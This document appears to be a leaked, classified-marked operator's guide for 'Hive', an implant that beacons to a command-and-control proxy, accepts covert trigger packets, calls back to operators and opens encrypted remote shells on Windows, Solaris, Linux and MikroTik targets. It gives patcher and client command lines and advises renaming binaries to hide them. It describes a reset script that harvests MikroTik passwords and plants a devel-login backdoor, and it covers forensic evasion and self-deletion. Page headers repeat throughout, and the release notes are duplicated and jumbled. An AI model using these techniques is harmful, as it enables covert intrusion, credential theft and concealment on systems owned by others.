(U) Hive 2.6.2 User's Guide: Secret//Noforn
(U) Hive 2.6.2 User's Guide: Secret//Noforn
(U) Hive 2.6.2 User's Guide: Secret//Noforn
SECRET//NOFORN
SECRET//NOFORN (U) Hive 2.6.2 User's Guide
ii SECRET//NOFORN//20390113
(U) Hive 2.6.2 User's Guide SECRET//NOFORN
SECRET//NOFORN//20390113 iii
SECRET//NOFORN (U) Hive 2.6.2 User's Guide
iv SECRET//NOFORN//20390113
(U) Hive 2.6.2 User's Guide SECRET//NOFORN
1 (U) Overview...........................................................................................................................................1
2 (U) Pre-Deployment...............................................................................................................................3
2.1 (S) Swindle........................................................................................................................................3
2.2 (S) Tool Handler...............................................................................................................................3
2.3 (S) Patcher.........................................................................................................................................4
2.4 (S) SSL Certificates..........................................................................................................................5
3 (U) Deployment......................................................................................................................................6
3.1 (S) Beacons.......................................................................................................................................6
3.2 (S) Triggers.......................................................................................................................................6
3.3 (S) Clients.........................................................................................................................................7
3.3.1 (S) hclient...................................................................................................................................7
3.3.2 (S) Cutthroat/Hive-ILM.............................................................................................................8
3.3.3 (S) Client Operational Notes....................................................................................................11
3.4 (S) hiveReset_v1_0.py....................................................................................................................12
4 (U) Post-Deployment............................................................................................................................14
4.1 (S) Self-Delete................................................................................................................................14
5 (U) Troubleshooting.............................................................................................................................15
6 (U) Appendix A: Idiosyncrasies & Limitations.................................................................................16
7 (U) Appendix B: Release Notes...........................................................................................................17
V2.6 01/30/2013....................................................................................................................................17
V2.5.2 12/06/2012.................................................................................................................................17
V2.5.1 11/29/2012.................................................................................................................................17
V2.5 06/20/2012....................................................................................................................................17
V2.4 03/05/2012....................................................................................................................................17
V2.3.1 01/23/2012.................................................................................................................................17
V2.3 12/12/2011....................................................................................................................................18
V2.2 08/22/2011....................................................................................................................................18
V2.1 05/23/2011....................................................................................................................................18
V2.2 08/22/2011....................................................................................................................................19
V2.1 05/23/2011....................................................................................................................................20
V2.0 05/9/2011......................................................................................................................................20
V1.1 04/14/2011....................................................................................................................................20
V1.0.2 01/21/2011*, 02/14/2011**, 03/07/2011***.............................................................................20
V1.0.1 2/22/2010...................................................................................................................................21
V1.0 10/27/2010....................................................................................................................................21
8 (U) For Further Assistance.................................................................................................................22
SECRET//NOFORN//20390113 v
SECRET//NOFORN
(U) Hive 2.6.2 User's Guide (U) Overview
1 (U) Overview
(S) Hive is a software implant designed with “Ring 2” operations in mind. It has two primary functions:
beacon and interactive shell. By design, both are limited in features with the purpose of providing an
initial foothold for the deployment of other full featured tools.
(S) Hive provides implants for the following target operating systems and processor architectures See
section 7 starting on page 17 for more details about available and tested versions.
* Linksys WRT54G flashed with DD-WRT v24sp2 used as surrogate for testing MikroTik MIPS-LE
binaries. No actual RouterBoard (i.e. MikroTik) hardware was used.
(S) The Hive release consists of the following files along with the unpatched binaries.
Filename Function
css.xml XML file for cutthroat's custom command set.
hclient Linux executable. Used to send triggers to and interactively communicate with the
Hive implants. Has not been updated since Hive v1.X, but most implant features
still work with it.
hive Cutthroat ILM (i.e. module, shared library object). Provides the client functionality
to send triggers to, and interactively communicate with, the Hive implants.
SECRET//NOFORN//20390113 1
SECRET//NOFORN
(U) Overview (U) Hive 2.6.2 User's Guide
Filename Function
hive-patcher Linux executable. When run, it produces executables with command line
parameters patched-in.
hiveReset_v1_0.py Python script for updating existing hive implants on remote boxes with a more
recent version.
honeycomb.py Linux executable. Tool handler for Hive beacons. HTTPS beacons validated by
Swindle are passed to Honeycomb. Honeycomb receives and logs the beacons.
swindle.cfg ASCII text file. Hive beacons use Loki's Blot DP/LP. Swindle is the HTTPS proxy
that verifies the beacons before forwarding to the tool handler.
(S) Below is the list of files included in this release, along with their size and MD5 hashes.
2 SECRET//NOFORN//20390113
SECRET//NOFORN
(U) Hive 2.6.2 User's Guide (U) Pre-Deployment
2 (U) Pre-Deployment
(S) Before initial deployment, Loki's Blot/Swindle must be set-up with Hive's Tool ID (0x65ae82c7) to
proxy connections to the Honeycomb tool handler. Honeycomb can reside on the same server as Swindle
but it is strongly recommended that it be deployed on a different server. Honeycomb acts much like a
traditional iterative server that handles incoming beacon connections one-by-one. After the implant is
validated by Swindle, the implant traffic is re-routed directly to Honeycomb. Honeycomb then
establishes an encrypted session with the implant. Swindle continues to proxy the encrypted network
packets.
where:
<port> is the port that honeycomb will listen on for proxy connections coming from Swindle.
<file path> is the location where beacon rsi files will be written.
<log path> is the location where beacon log files will be written.
(S) Upon receiving a beacon, Honeycomb will parse-out the MAC address, public IP address, and
uptime of the implanted box. Honeycomb will then write out a ".rsi" file that is one-way transferred for
ingestion into Ripper Snapper. The implant ID used in the Ripper Snapper files is the unformatted MAC
address of the implanted box. As of Hive 2.0 additional survey data are collected from the beacon.
Additional information on this data can be found in section 3.1.
(S) Hive v2.0 functionality was added to Honeycomb so that it will keep a basic log of beacons that are
received. Every beacon will have a log entry created that contains a timestamp of when the beacon was
received, the MAC address, public IP address, and the version of the implant that beaconed. In addition,
for Hive v2.0 beacons and later, there will be a flag related to which OS the beacon came from.
SECRET//NOFORN//20390113 3
SECRET//NOFORN
(U) Pre-Deployment (U) Hive 2.6.2 User's Guide
where:
<addr> is the IP address or hostname of beacon server, that is, the Swindle proxy.
<port> is the (optional) beacon port. Default is 443 for HTTPS which is the protocol the Hive
implants and Swindle emulate.
<b_delay> is the initial delay (in seconds) before the first beacon is sent. If b_delay is 0, then
beacons will be disabled.
<interval> is the beacon interval or sleep time between beacons (in seconds).
<jitter> is the beacon jitter (as a percentage). That is, the amount of beacon variation as a
percentage of current beacon interval.
<sd_delay> is the self delete delay (in seconds). Amount of time since last successful beacon or
trigger allowed to pass before self-deletion occurs. If unused, the default value is 60
days in seconds.
<t_delay> is the (optional) delay (in seconds) between trigger received and callback +/- 30
seconds.
<interface> (Solaris only) The interface on which to listen for triggers. Usually something like
“hme0” or “e1000g0”. Required option for Solaris, but ignored for Windows, Linux,
and MikroTik.
<OS> is the target operating system. Patch parameters into this type of executable. Options are
'all', 'raw', 'win', 'mt-x86', 'linux-x86', 'sol-x86', or 'sol-sparc'. 'all' is the default. 'raw'
provides all binaries but unpatched versions.
Examples:
(S) Patch Windows executable to beacon to 10.3.2.169:443 every hour, with 5% beacon jitter
variance, after default initial delay using:
./hive-patcher -a 10.3.2.169 -i 3600 -j 5 -m win
4 SECRET//NOFORN//20390113
SECRET//NOFORN
(U) Hive 2.6.2 User's Guide (U) Pre-Deployment
(S) Patch Solaris SPARC executable to beacon to 10.3.2.169:443 every hour with initial delay of
one hour using interface hme0 with:
./hive-patcher -a 10.3.2.169 -p 443 -i 3600 -d 3600 -I hme0 -m sol-sparc
(S) NOTE 1: Change the name of the resulting executable into another name that would be consistent
with hiding it on the target system before deployment. Record the new name so you can use it for future
reference as required.
(S) NOTE 2: The patcher will support hostnames up to 256 characters long.
SECRET//NOFORN//20390113 5
SECRET//NOFORN
(U) Deployment (U) Hive 2.6.2 User's Guide
3 (U) Deployment
(S) The goal is for the operator to have a consistent user experience, regardless of the implant's operating
system. On the wire, the implant mimics a SSLv3 handshake with Swindle (LP) and then sends a small
amount of encrypted data to the tool handler. The encrypted beacons consist of the Swindle Tool ID,
system uptime, and MAC address*. Hive version 2.0 added additional survey information to the beacon.
This data includes a process listing, ipconfig/ifconfig, "netstat -rn", and a "netstat -an". In the event the
survey fails, the RSI file will show an empty data element in the XML.
*NOTE: (S) The Windows implant pulls the MAC address from what the O/S thinks is the “primary”
network interface. The Solaris implant attempts to pull the MAC address first from an interface named
hme0 and then e1000g0 regardless of whether those interfaces are configured, active, or not. Similarly,
the Linux and MikroTik implants use the MAC assigned to the eth0 interface. At this time, the MAC
address is used only as a unique identifier for tracking implants.
(S) The beacon parameters cannot be changed dynamically by the hive tool handler. To change the
beacon parameters, the implants need to be re-patched with new parameters and re-deployed, or in the
case of unpatched implants, they need to be restarted with new command line arguments.
(S) The raw-udp trigger can be sent to any UDP port on the target system. The raw-tcp trigger can be
sent to any open and listening port on the target system.
6 SECRET//NOFORN//20390113
SECRET//NOFORN
(U) Hive 2.6.2 User's Guide (U) Deployment
(S) During preliminary developer testing, it was discovered that some ISPs may block, as a matter of
policy, ICMP error packets. Your mileage may vary. However, the developers also discovered that the
Windows firewall setting ON with no exceptions blocks all triggers except the icmp-error triggers.
[Note: Cisco ASA default policy is to drop ICMP error and IV&V results were contrary.]
(S) The Hive implant watches for trigger packets in the incoming flow of network traffic. This “sniffer”
behavior is slightly different on each operating system. On Windows, Hive listens for traffic only on the
network interface the operating system deems is the “primary network interface.” On Solaris, the user
must specify which single interface to sniff via either the patcher or the command line using the -I
switch. On Linux and MikroTik, Hive listens on all physical interfaces.
(S) Once the implant receives a valid trigger, it pulls the callback IP address and port from the trigger
packet, waits a default delay, and then calls back to the listening Hive client. Once connected, the
implant and Hive client perform a TLS handshake and initialize an AES encrypted session. See (U)
Appendix A: Idiosyncrasies & Limitations on page 16 for special situations.
To listen only:
./hclientlinux p <port>
where:
<port> is the callback port.
<raw_port> is used when using raw triggers. This specifies on which port to send the trigger.
(required for raw triggers)
<mode> tells the client to listen-only (l), trigger-only (t), or both (b). Both is the default.
SECRET//NOFORN//20390113 7
SECRET//NOFORN
(U) Deployment (U) Hive 2.6.2 User's Guide
(S) Once connected, the Hive client provides an interactive session with basic functions. "Old school"
operators will recognize the Hive client – it is essentially the same interface with commands used by the
Forklift tool.
exit | q close the TCP connection but keep the server running on the remote
computer
shutdown | shut for the Windows implant, closes the TCP connection and stop the server
running on the remote computer. This DOES NOT uninstall or delete the
implant. See NOTES below for details. For the *nix implants, same as
exit.
8 SECRET//NOFORN//20390113
SECRET//NOFORN
(U) Hive 2.6.2 User's Guide (U) Deployment
(S) If the Hive ILM loads, the operator will see a “[success] Successfully loaded hive
[load]” message followed by cutthroat's standard greeting which includes cutthroat's version number
on the computer terminal. The operator may hit the “tab” key at any time to see a list of available
commands for the operator to select while operating cutthroat.
(S) Warning: When using two clients to separately handle trigger and listen, the operator should
start the listener first. The operator should assume failure unless the operator receives a “Success”
message via the cutthroat interface.
(S) NOTE: When the target is a Solaris platform, do not close any shell until the end of the session. If
you do, you must retrigger the device to use any trigger commands (e.g. upload, download, etc.). The
ILM reminds the user with the following note:
NOTE FOR SOLARIS ONLY: Keep all shells open until you are done.
Once you close any solaris shell, the trigger will appear normal
but it is no longer connected. In this case, you must quit the
trigger and retrigger the device.
where <port number> is any number from 1 through 65535. For example, if the operator enters “ilm
listen 4567”, they should observe the following message “Listening for connection on
port 4567 ...”.
(S) The listener will continue listening on the assigned port until it receives a response from the implant
or the operator kills the current process.
See the section 3.3.2.4 for details on how to create a trigger file.
SECRET//NOFORN//20390113 9
SECRET//NOFORN
(U) Deployment (U) Hive 2.6.2 User's Guide
3.3.2.4 (S) Disconnected State: Cutthroat Trigger
(S) To start the trigger, enter:
ilm listen <triggerFileName>
where the <triggerFileName> is the name of any file in the directory where cutthroat is running. If the
trigger file does not exist, the requested trigger file will be created and the operator will be prompted for
the following information:
Listener's IP Address IP address used by the implant to connect back to the Listener.
Listener's Port Number Open port on the Listener waiting for the implants callback
raw port Raw Port number in the range of 1 through 65535 where the raw-tcp or
raw-udp trigger will be sent. For all other trigger protocols (i.e.
dns-request, tftp-wrq, icmp-error, ping-reply, ping-request), this should
be set to -1.
(S) The trigger file will contain each of the previously defined parameters separated by a '|' between each
field. A sample of the first line of a sample trigger file is shown below:
10.3.2.141|4567|10.2.5.99|dns-request|-1
where the listener's IP address is 10.3.2.141, listener's port number is 4567, the Implant is running on a
target host with IP address of 10.2.5.99 and a dns-request protocol type will be used to trigger the
implanted device. Note that since a dns-request protocol is being used, the raw port is set to -1.
(S) If the trigger file does exist, the operator should see a message of the parameters used for the trigger
displayed on the screen as well as a “The trigger was sent.” message, along with a success or failure
status. NOTE: A “success” at this point only means that a trigger was sent.
(S) If everything worked, the listener should receive a callback from the implant based on implant's
configured trigger delay. The client is now in a connected state and different command line options are
available in cutthroat.
(S) NOTE: The operator should verify that the “[<implant IP address>]” prompt within the
listener actually displays the intended target's IP address. It has been noted that other implants
that also receive the trigger packet may attempt to respond, thus creating a race condition where
the first device to respond will usually receive the connection.
10 SECRET//NOFORN//20390113
SECRET//NOFORN
(U) Hive 2.6.2 User's Guide (U) Deployment
file put upload a file to the remote computer. Requires 2 arguments: source and destination
filenames. NOTE: Be sure the target has sufficient space for the file, as Hive
does not currently provide any indication of an unsuccessful transfer due to
insufficient space on the filesystem.
file get upload a file to the remote computer. Requires 2 arguments: source and destination
filenames.
file delete delete a file on the remote computer. Requires 1 argument: filename.
ilm exit close the Listener's TCP connection, but keep the server implant running on the
remote computer. Cutthroat application stays open. Same as shutdown now.
quit close the Listener's TCP connection, but keep the server implant running on the
remote computer. Cutthroat application will also close.
shutdown now close the Listener's TCP connection, but keep the server implant running on the
remote computer. Cutthroat application stays open. Same as ilm exit.
shell open open an encrypted shell with the client (as a separate process). Takes three
parameters in the following order: client IP address, client port number, and a
password that initializes the Twofish symmetric cipher. See the example below.
Hive v2.6.2 supports the encrypted secure shell on all devices.
NOTE: This shell will remain open and connected to the target host until
exited even if the ILM client is exited.
SECRET//NOFORN//20390113 11
SECRET//NOFORN
(U) Deployment (U) Hive 2.6.2 User's Guide
3.3.3.2 (S) Default File Permissions
On Solaris, Linux, and MikroTik, files uploaded are written to the remote system with 644 permissions.
After uploading an executable, and before executing it, make the file executable by using Hive to
execute chmod a+x <filename>.
Old implant file name Name of Hive implant currently running on the remote box.
Installation directory full path name that starts and ends with a “/” where the old Hive implant is
currently installed (e.g. /rw/pckg/).
12 SECRET//NOFORN//20390113
SECRET//NOFORN
(U) Hive 2.6.2 User's Guide (U) Deployment
Operating System Mikrotik MIPS LE, Mikrotik MIPS BE, Mikrotik PPC, Mikrotik x86, Solaris
sparc, Solaris x86, Linux, or Windows. NOTE: An update capability for
Microsoft Windows does not exist at this time.
Full busybox name For Mikrotik routers only. Includes the full path prefix with busybox name
(e.g. /rw/pckg/busybox).
New Hive implant name New Hive implant filename that was just created using the hive-patcher
program specified above.
Cutthroat parameters Callback IP and port, trigger type, remote IP (box with Hive implant that will
be updated), etc. as specified above.
(S) After the operator has determined all the above parameters and has the necessary files (new Hive
implant, Cutthroat, and Hive (ILM)), the operator may update a box using the following command:
hiveReset_v1_0.py [s, b] f <Configuration File name>
where the -s option means only a single box will be updated and the -b option refers to a batch process
where multiple boxes are updated. Note that the user may also use a -h option to display a usage
statement. If the configuration file does not exist, just give it a new name and it will be created after the
operator has answered a variety of questions.
(S) This same configuration file, can be used to update multiple Hive implants as long as they have the
same configuration. For example if two boxes with IP addresses of 10.1.2.3 and 10.3.2.1 respectively
are running an old Hive implant (same name) in the same installation directory (same full path name)
with the same busybox name “e.g. /rw/pckg/busybox” both boxes could be updated using the following
command:
hiveUpdater.py b f <Configuration File name>
where the Configuration File contains a line for the target File which contains the IP address of each box
being updated. In this case, “10.1.2.3” and “10.3.2.1” would both be on a separate line. Note that this
list may contain multiple target IP addresses, but all the Hive Updater Configuration settings contained
within the configuration file must be the same. Note that once these files are created, they may be used
again for all future updates as long as the parameters remain the same.
(S) Note that this python script also contains a reset option which will reset the /var/.config timer file for
all linux, Mikrotik, and Solaris boxes. This reset script was also modified to retrieve passwords and
create one directory on all Mikrotik devices per guidance from COG based on their standard exploits.
Passwords contained in the /nova/store/user.dat and the /rw/store/user.dat files are stored in a
pA.IPAddress and pB.IPAddress files respectivly for Mikrotik devices. The reset capability will also
create a /nova/etc/devel-login file that is used by COG to exploit the targeted device.
(S) It has been noted that this same update capability can and will be upgraded/expanded in future
versions of Hive to install other modules and tools for target exploitation in an automated fashion.
SECRET//NOFORN//20390113 13
SECRET//NOFORN
(U) Post-Deployment (U) Hive 2.6.2 User's Guide
4 (U) Post-Deployment
NOTE for Windows Only: In older versions of Hive, a hidden file named uninstallreadme.txt is
created in the "C:\windows” directory. The implant deletes the timer file and then creates a self-
deleting ".bat" file to delete the binary from disk.
(S) The decision to self-delete is determined by the difference between the system time and the last-
modified time stamp on the configuration file. Whenever the system time exceeds the time stamp on the
configuration file by more than the delete delay, Hive will self-delete. It is important to note that the
system time on implanted devices may vary widely depending upon the environment. Consequently, the
simple act of correcting the date/time on the device by a system administrator could result in self-
deletion.
14 SECRET//NOFORN//20390113
SECRET//NOFORN
(U) Hive 2.6.2 User's Guide (U) Troubleshooting
5 (U) Troubleshooting
(S) Below is an example two ILM client sessions, the uncolored area being common to both. The light
green section shows a good connection, the light yellow a bad connection that was caused by using an
SSL certificate chain (ca.crt) that doesn't match the server certificate (server.crt).
CutThroat
JY008C634-6
Version: 2.2
CCS Version: 2.2
Usage:
Trigger details:
. Remote IP address 10.6.5.190 with dns-request trigger
. Callback IP address 10.6.5.195 on port 8123
Trigger sent.
Connection details:
. Remote IP address 10.6.5.190 on port 42146
. Local IP address 10.6.5.195 on port 8123
[Success]
************ Success ************
[ilm connect 10.6.5.190]
>
SECRET//NOFORN//20390113 15
SECRET//NOFORN
(U) Appendix A: Idiosyncrasies & Limitations (U) Hive 2.6.2 User's Guide
(S) On Solaris or Linux, executing a GUI program without backgrounding the process (using an
ampersand on the command line following the command) may cause the interactive session to hang.
Generally, it is probably a bad idea to execute a GUI program on your target anyway.
(S) On Solaris, Linux, and MikroTik, files uploaded are written to the remote system with 644
permissions. After uploading an executable and before executing it, make the file executable by using
Hive to execute chmod a+x <filename>.
(S) MikroTik systems store DNS configuration in a proprietary format. Even if the MikroTik is
configured with DNS server(s), the MikroTik system libraries don't know how to read it. Therefore,
Hive cannot resolve hostnames. The operator could enable DNS by creating the /etc/resolv.conf file and
marking it as executable. The following example uses Google's public DNS server:
echo “nameserver 8.8.8.8” > /etc/resolv.conf && chmod a+x /etc/resolv.conf
(S) The implant sniffs all traffic it can see, looking for a valid trigger. For example, if there are multiple
hosts on a hub (not a switch), a trigger packet sent to a non-implanted host will be seen by the implant
and cause a callback. Similarly, if there are multiple implanted hosts on a hub, then a race condition
exists. The host implant responding first will typcially get the connection. This can also have other
ramifications. For example, if the border router is implanted, as well as others deeper in the target
network, all triggers sent to any host (implanted or not) in that network will be first seen by the border
router and the operator will receive a callback from the Hive implant on the border router.
(S) To verify secure delete on Solaris, one must first unmount the partition.
(S) If the system time on target is reset or advanced 60 days into the future, the Hive implant will
self-delete itself. Also if the target machine is down for 60 days, the implant will self-delete itself on
startup.
(S) Hive on Windows 2000 may have issues receiving UDP type triggers due to a bug in the O/S
(reference Windows Hotfix: support.microsoft.com/kb/890856).
16 SECRET//NOFORN//20390113
SECRET//NOFORN
(U) Hive 2.6.2 User's Guide (U) Appendix B: Release Notes
V2.6.1 03/15/2013
• Removes string definitions used to obfuscate debug code that was not needed in Hive releases,
but that could be revealing if found.
V2.6 01/30/2013
• This release of Hive primarily addresses forensic issues discovered by a forensic analysis
performed by IOC/AFD on Hive version 2.5 and documented in their report from October 26,
2012 (AFD-2012-0973-2). Hive 2.6 changes the common trigger encoding along with the
encoding scheme for raw TCP and UDP triggers.
• The SSL server certificates used with the Hive client (command and control) are now read from
files rather than being hard-coded into the client. In addition, the Diffie-Hellman paramters used
to establish the SSL connections have been changed.
V2.5.2 12/06/2012
• Fixes a bug in the 2.5 code that was also carried into 2.5.1 that may lead to premature self-
deletion of the implant.
V2.5.1 11/29/2012
• Modifies all mikrotik, linux, and solaris code so any successful beacon or trigger will also create
a /var/.config timer file if it does not already exists. Note that the trigger listening function will
automatically self delete the executable if it discovers that the /var/.config file does not exists. If
a self delete occurs, the normally empty /var/.config will contain a time stamp when the actual
self delete occurred using a yymmddHHMMSS format. Previous versions would allow the
executable to stay on the box but would stop the process whenever the /var/.config file was
removed. Version 2.4's Caution for Solaris shells still applies. A new Hive updating script called
hiveReset_v1_0.py was added which also resets the self-delete timer for all linux, Mikrotik, and
Solaris devices.
V2.5 06/20/2012
• Allows operator to change the self delete timer from the previously hard coded setting of 60
days. The delay option unit was changed to long versus int to enable longer delays before the
first beacon. A hiveUpdater.py script was added to allow remote updates of Hive implants for
Linux, Solaris, and Mikrotik routers. Version 2.4's Caution for Solaris shells still applies.
SECRET//NOFORN//20390113 17
SECRET//NOFORN
(U) Appendix B: Release Notes (U) Hive 2.6.2 User's Guide
V2.4 03/05/2012
• Allows full shell open capability for all boxes. Solaris boxes are cautioned to close any shells
they open at then end. Otherwise, when a Solaris shell is closed, the trigger session is also
closed. This code should remove Mikrotik "spillage" problems in beacons. Setting the beacons
initial delay with the -d option (i.e. -d 0 ) also stops all beacons.
V2.3.1 01/23/2012
• Added support for Windows 2000.
• No change to *nix binaries.
V2.3 12/12/2011
• All implants updated to include support for beacon jitter and compresssed beacons.
• Beacon code was significantly re-worked as part of the beacon jitter and compression features.
The hope is that this also fixes the non-parsable characters that sometimes are sent by MikroTik
implants (i.e. "spillage").
• Secure shell functionality was added to the following supported platforms:
◦ Windows (all)
◦ Linux x86
◦ MikroTik (all)
◦ Solaris SPARC 9-10
• With this release, secure shell does not work on the following platforms:
◦ Solaris SPARC 8
◦ Solaris x86 8-10
◦ To use the secure shell functionality, users must use the updated Hive ILM module that
provides this command. The Hive v1.0 hclient continues to work with other features, but was
not updated to support the new secure shell functionality.
V2.2 08/22/2011
◦ Updated Windows with the Trigger hanging fixes from 2.1.
◦ Windows can now handle multiple triggered connections at once.
◦ All platforms will now self-delete themselves after 60 days of no contact
◦ Added enhanced beacon functionality to Mikrotik. Mikrotik can now return ifconfig, netstat
-an, netstat -rn, and a ps -ef.
◦ Fixed an issue where Mikrotik implants would not beacon after the router had been rebooted.
V2.1 05/23/2011
◦ Updated code with reliablity fixes so the trigger no longer hangs due to an implant being
improperly shutdown. These fixes are currently implemented on all platforms except for
Windows.
◦ Updated the beacon code so that it now returns more survey data. This data includes
ipconfig/ifconfig, netstat -an, netstat -rn, and a process list. Currently Mikrotik returns
empty data due to the actually commands not existing on a host unless busybox is present.
◦ Added support for the new beacons and beacon format to honeycomb. Honeycomb is
backwards compatable with beacons back to Hive v1.1.
◦ v2.0 05/9/2011
18 SECRET//NOFORN//20390113
SECRET//NOFORN
(U) Hive 2.6.2 User's Guide (U) Appendix B: Release Notes
◦ Added support for use of the Hive client through the CutThroat interface.
◦ v1.1 04/14/2011
◦ Backport of stability and reliablity fixes we added to Hive 2.0 36.
◦ Updated hclient to give slightly better feedback to user when connection 37 goes down.
◦ v1.0.2 01/21/2011*, 02/14/2011**, 03/07/2011***
◦ Primarily a release to port Hive to MikroTik x86 RouterOS 3.x and 4.x
◦ Fixed beacons to handle DNS failures
◦ Fixed beacons to handle connection attempts to closed ports
◦ Fixed daemonizing code for MikroTik build. Improper daemonizing was causing triggers to
fail.
◦ Due to unavailablility of RouterBoard MIPS-LE hardware, testing for MikroTik MIPS-LE
3.x-4.x wasdone on a Linksys WRT54G reflashed with DD-WRT v24-sp2.
◦ For MikroTik, Hive binaries were linked against uClibc libraries and are unlikely to work on
older firmware such as the 2.x series.
◦ Latest official releases and tested versions:
◦ Windows XP SP0-SP3 -- v1.0.1; v1.0.2 untested
◦ Windows 2003 -- v1.0.1; v1.0.2 untested
◦ Solaris SPARC 9-10 -- v1.0.1; v1.0.2 untested
◦ Solaris x86 9-10 -- v1.0.2**
◦ MikroTik x86 3.x-4.x -- v1.0.2
◦ MikroTik PPC 4.x -- v1.0.2*
◦ MikroTik PPC 3.x -- v1.0.2 untested
◦ MikroTik MIPS-BE 4.x -- v1.0.2*
◦ MikroTik MIPS-BE 3.x -- v1.0.2 untested
◦ MikroTik MIPS-LE 4.x -- v1.0.2***
◦ MikroTik MIPS-LE 3.x -- v1.0.2***
◦ Linux x86 -- v1.0.2**
◦ v1.0.1 2/22/2010
◦ DR fix for patcher. v1.0 patcher does not allow hostnames to be patched into binaries. v1.0.1
allows both IP adresses and hostnames
◦ Re-released patcher, but implants and client are functionally unchanged.
◦ Latest official releases and tested versions:
◦ Windows XP SP0-SP3 -- v1.0.1
◦ Windows 2003 -- v1.0.1
◦ Solaris SPARC 9-10 -- v1.0.1
◦ Linux x86 -- v1.0.1 untested
◦ v1.0 10/27/2010
◦ Released Hive client, patcher, and implants for Windows x86 and Solaris SPARC
◦ Prototype Linux x86 implant provided in patcher
◦ Official releases and versions:
◦ Windows XP SP0-SP3 -- v1.0
◦ Windows 2003 -- v1.0
◦ Solaris SPARC 9-10 -- v1.0
SECRET//NOFORN//20390113 19
SECRET//NOFORN
(U) Appendix B: Release Notes (U) Hive 2.6.2 User's Guide
◦ Linux x86 -- v1.0 untestedSolaris SPARC 8
◦ Solaris x86 8-10
• To use the secure shell functionality, users must use the updated Hive ILM module that provides
this command. The Hive v1.0 hclient continues to work with other features, but was not updated
to support the new secure shell functionality.
V2.2 08/22/2011
• Updated Windows with the Trigger hanging fixes from 2.1.
• Windows can now handle multiple triggered connections at once.
• All platforms will now self-delete themselves after 60 days of no contact
• Added enhanced beacon functionality to Mikrotik. Mikrotik can now return ifconfig, netstat -an,
netstat -rn, and a ps -ef.
• Fixed an issue where Mikrotik implants would not beacon after the router had been rebooted.
V2.1 05/23/2011
• Updated code with reliablity fixes so the trigger no longer hangs due to an implant being
improperly shutdown. These fixes are currently implemented on all platforms except for
Windows.
• Updated the beacon code so that it now returns more survey data. This data includes
ipconfig/ifconfig, netstat -an, netstat -rn, and a process list. Currently Mikrotik returns empty
data due to the actually commands not existing on a host unless busybox is present.
• Added support for the new beacons and beacon format to honeycomb. Honeycomb is backwards
compatable with beacons back to Hive v1.1.
V2.0 05/9/2011
• Added support for use of the Hive client through the CutThroat interface.
V1.1 04/14/2011
• Backport of stability and reliablity fixes we added to Hive 2.0 36.
• Updated hclient to give slightly better feedback to user when connection 37 goes down.
V1.0.2 01/21/2011*, 02/14/2011**, 03/07/2011***
• Primarily a release to port Hive to MikroTik x86 RouterOS 3.x and 4.x
• Fixed beacons to handle DNS failures
• Fixed beacons to handle connection attempts to closed ports
• Fixed daemonizing code for MikroTik build. Improper daemonizing was causing triggers to fail.
• Due to unavailablility of RouterBoard MIPS-LE hardware, testing for MikroTik MIPS-LE 3.x-
4.x wasdone on a Linksys WRT54G reflashed with DD-WRT v24-sp2.
• For MikroTik, Hive binaries were linked against uClibc libraries and are unlikely to work on
older firmware such as the 2.x series.
• Latest official releases and tested versions:
◦ Windows XP SP0-SP3 -- v1.0.1; v1.0.2 untested
◦ Windows 2003 -- v1.0.1; v1.0.2 untested
20 SECRET//NOFORN//20390113
SECRET//NOFORN
(U) Hive 2.6.2 User's Guide (U) Appendix B: Release Notes
◦ Solaris SPARC 9-10 -- v1.0.1; v1.0.2 untested
◦ Solaris x86 9-10 -- v1.0.2**
◦ MikroTik x86 3.x-4.x -- v1.0.2
◦ MikroTik PPC 4.x -- v1.0.2*
◦ MikroTik PPC 3.x -- v1.0.2 untested
◦ MikroTik MIPS-BE 4.x -- v1.0.2*
◦ MikroTik MIPS-BE 3.x -- v1.0.2 untested
◦ MikroTik MIPS-LE 4.x -- v1.0.2***
◦ MikroTik MIPS-LE 3.x -- v1.0.2***
◦ Linux x86 -- v1.0.2**
V1.0.1 2/22/2010
• DR fix for patcher. v1.0 patcher does not allow hostnames to be patched into binaries. v1.0.1
allows both IP adresses and hostnames
• Re-released patcher, but implants and client are functionally unchanged.
• Latest official releases and tested versions:
◦ Windows XP SP0-SP3 -- v1.0.1
◦ Windows 2003 -- v1.0.1
◦ Solaris SPARC 9-10 -- v1.0.1
◦ Linux x86 -- v1.0.1 untested
V1.0 10/27/2010
• Released Hive client, patcher, and implants for Windows x86 and Solaris SPARC
• Prototype Linux x86 implant provided in patcher
• Official releases and versions:
◦ Windows XP SP0-SP3 -- v1.0
◦ Windows 2003 -- v1.0
◦ Solaris SPARC 9-10 -- v1.0
◦ Linux x86 – v1.0 untested
SECRET//NOFORN//20390113 21
SECRET//NOFORN
(U) For Further Assistance (U) Hive 2.6.2 User's Guide
22 SECRET//NOFORN//20390113